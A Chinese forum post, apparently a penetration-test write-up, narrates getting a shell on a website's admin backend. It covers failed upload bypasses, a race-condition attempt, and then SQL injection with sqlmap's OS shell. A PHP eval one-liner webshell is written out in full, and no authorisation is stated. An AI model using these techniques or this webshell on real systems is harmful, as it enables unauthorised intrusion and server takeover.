记录某网站后台GETSHELL

冰封小天堂   ·   发表于 2020-11-27 21:43:17   ·   实战纪实

目录
0x00:探测后台
0x01:尝试上传图片马
0x02:利用在线网站收集信息
0x03:挖掘后台注入点
0x04:利用sqlmap写一句话

0x00:探测后台

首先直接就是后台,账号密码是自动填充的,直接登陆即可

登陆后呢就是这个破样子,话不多说开工

先把各个板块的功能啥的都看了一下,发现了几个可以上传的地方,同时对端口何目录进行了一波扫描,还有微步扫了一下网站的中间件等信息(这里就是先一波信息收集,为后面做准备)

在签到处,并没有发现上传点,但是可以打xss,但没什么卵用(我都进后台了还打个锤子xss)

0x01:尝试上传图片马

在这个签到报表处,可以看到有下载选项,可一抓包测试下是否存在任意文件下载,但这里对我getshell没啥用就先搁置了

然后又在任务管理处找到了一处上传点

接下来自然就是抓包一波测试,遗憾的发现这里是白名单,并且会重置你的文件名,使用00截断会提是检测到非法文件名,无法绕过

在这里我们先上传了正常文件,然后我们复制图片地址,还拿可以便利目录,但是无法../跳出

虽然可以遍历目录,但无法../跳出目录

把所有目录翻了一遍,发现存在一个编辑器,查询编辑器版本并没有发现什么有用的漏洞,尝试了编辑器上传文件和图片,同样使用了白名单,并且无法截断,淦

0x02:利用在线网站收集信息

做到此处不仅陷入沉思,这到底是个什么鬼,去查看了微步的检测结果,和扫描端口目录,(端口和目录并没有收获),端口扫到还存在另一个登陆页面,但是右显示验证码暂且无视,目录并没扫到有价值的

从微步中我们也得到一些有价值的信息,他的PHP版本可以使用截断,apache也存在解析漏洞,但这里都无法利用,因为apache的解析漏洞原理是,他是从右往左判断后缀,也就是我们可以1.php.ssss 这样,他认不出来ssss是个什么就会继续往前解析,遇到php他人出来了就当成php文件来解析,但此处设置了严格的白名单过滤,导致我们根本咩办法上传无法被识别的后缀

搜集端口后,发现开启了22,和3389,其他的并没有什么意义,和两个端口可以尝试进行爆破,但先搁置了

此后对那几处上传点进行了测试,并没有得到想要的结果,无法绕过

随后陷入沉思,最后跟大师傅们求助,有大师傅说,试试登录框存在注入不,是否可以直接sqlmap写shell,另一位大师傅则说,可以尝试条件竞争,妙哉,于是都进行了尝试,一边sqlmap跑,一边条件竞争了一下

这里条件竞争就是服务器是先把文件上传了,然后在判断,但这个过程非常快,所以理论手速够快就可以访问到,这里我抓去了上传一个php文件的包,这个文件只要被访问就会在当前目录创建一个1.php,其中有一个一句话木马,然后在抓去了一个访问包,俩个个都发送到了爆破模块开始疯狂跑但速度非常慢,此处无果

0x03:挖掘后台注入点

再次返回起始点,检查发现最后一个模块字里有个(旧),说明他和前面的不是一样的

在这个点我们测试下sql注入,发现被正常执行了

而这个就没有

0x04:利用sqlmap写一句话

这里我们测试其他板块,会发现不行,所以我们抓了此处的查询包,丢去sqlmap跑

这里注意不要用—batch参数,因为一开始他会问你:是否要继续?(sqlmap可能有问题)这里默认选择是不继续的,所以用了batch它默认就给退掉了

这里问我们目标用的什么语言,这里是php

这里问需要爆破一下目录吗,选择y,然后我们得到了绝对路径

然后拿到了交互shell,dir一下可以出现目录,没问题,然后我们需要写入一个一句话,或者上传个一句话

这里呢我使用了echo直接写个一句话出来,方法有很多,这里sqlmap写这个交互shell的时候会创建一个上传用的php文件,我们可以通过它上传一句话,或着别的

这里我们写的语句是:

echo ^<?php @eval($_REQUEST[“HT”])?^> > D:\wamp\www\1.php

^是用来防止<>被转义,因为默认会把他们转义掉,所以我么要用^来防止被转义,这里就是把这个一句话写入到d盘www目录下的1.php文件里,没有的话他会创建一个文件,然后我们用我们的蚁剑连接

最后打波广告欢迎大家关注我们的公众号神隐攻防实验室

用户名金币积分时间理由
奖励系统 100.00 0 2020-12-14 09:09:50 投稿满 10 赞奖励
奖励系统 50.00 0 2020-12-01 17:05:07 投稿满 5 赞奖励
李的姓名 1.00 0 2020-11-30 13:01:12 跟随 涨姿势
veek 60.00 0 2020-11-30 09:09:25 一个受益终生的帖子~~

打赏我,让我更有动力~

3 Reply   |  Until 2020-12-14 | 814 View

806366862
发表于 2020-12-4

123

评论列表

  • 加载数据中...

编写评论内容

zzy0305
发表于 2020-12-8

上传哪里可以使用CGI解析漏洞吗

评论列表

  • 加载数据中...

编写评论内容

kidll
发表于 2020-12-14

白总牛逼,yyds

评论列表

  • 加载数据中...

编写评论内容
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.